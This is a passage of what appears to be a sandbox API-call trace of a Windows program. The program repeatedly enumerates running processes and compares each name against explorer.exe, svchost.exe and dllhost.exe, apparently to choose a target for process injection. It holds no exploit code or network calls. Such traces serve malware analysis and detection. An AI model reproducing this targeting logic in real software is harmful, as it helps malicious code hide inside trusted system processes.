th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0222.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0222.714] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0222.714] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0222.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0222.715] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0222.715] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.715] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.715] CloseHandle (hObject=0xec) returned 1 [0222.715] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0222.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0222.763] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.763] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.763] CloseHandle (hObject=0xec) returned 1 [0222.763] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0222.763] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0222.764] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.764] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.764] CloseHandle (hObject=0xec) returned 1 [0222.764] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0222.764] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0222.764] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.764] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.764] CloseHandle (hObject=0xec) returned 1 [0222.764] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.765] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0222.765] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.765] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.765] CloseHandle (hObject=0xec) returned 1 [0222.766] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0222.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0222.766] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.766] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0222.766] CloseHandle (hObject=0xec) returned 1 [0222.766] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0222.766] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0222.766] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0222.766] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0222.767] CloseHandle (hObject=0xe8) returned 1 [0222.767] Sleep (dwMilliseconds=0x3e8) [0223.785] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0223.787] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0223.788] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0223.788] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0223.789] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0223.789] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0223.790] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0223.791] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0223.791] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0223.792] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0223.792] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0223.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0223.793] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0223.793] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0223.794] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0223.794] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0223.795] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0223.795] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0223.796] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0223.796] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0223.797] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0223.797] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.797] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.797] CloseHandle (hObject=0xec) returned 1 [0223.797] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0223.798] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0223.798] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.798] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.798] CloseHandle (hObject=0xec) returned 1 [0223.799] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0223.799] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0223.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0223.800] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0223.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0223.800] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.800] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.800] CloseHandle (hObject=0xec) returned 1 [0223.800] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0223.800] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0223.800] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0223.800] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0223.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0223.801] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.801] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.801] CloseHandle (hObject=0xec) returned 1 [0223.801] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0223.801] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0223.801] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0223.801] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0223.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0223.802] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.802] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.802] CloseHandle (hObject=0xec) returned 1 [0223.802] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0223.802] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0223.802] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0223.802] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0223.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0223.802] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.802] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.802] CloseHandle (hObject=0xec) returned 1 [0223.802] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0223.802] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0223.802] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0223.802] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0223.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0223.803] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.803] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.803] CloseHandle (hObject=0xec) returned 1 [0223.803] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0223.803] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0223.803] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0223.803] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0223.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0223.804] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.804] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.804] CloseHandle (hObject=0xec) returned 1 [0223.804] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0223.804] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0223.804] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0223.804] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0223.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0223.804] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.804] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.804] CloseHandle (hObject=0xec) returned 1 [0223.804] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0223.804] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0223.804] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0223.804] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0223.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0223.805] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.805] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.805] CloseHandle (hObject=0xec) returned 1 [0223.805] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0223.805] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0223.805] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0223.805] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0223.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0223.806] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.806] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.806] CloseHandle (hObject=0xec) returned 1 [0223.806] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0223.806] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0223.806] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0223.806] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0223.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0223.806] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.806] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.807] CloseHandle (hObject=0xec) returned 1 [0223.807] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0223.807] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0223.807] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0223.807] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0223.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0223.807] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.807] IsWow64Process (in: 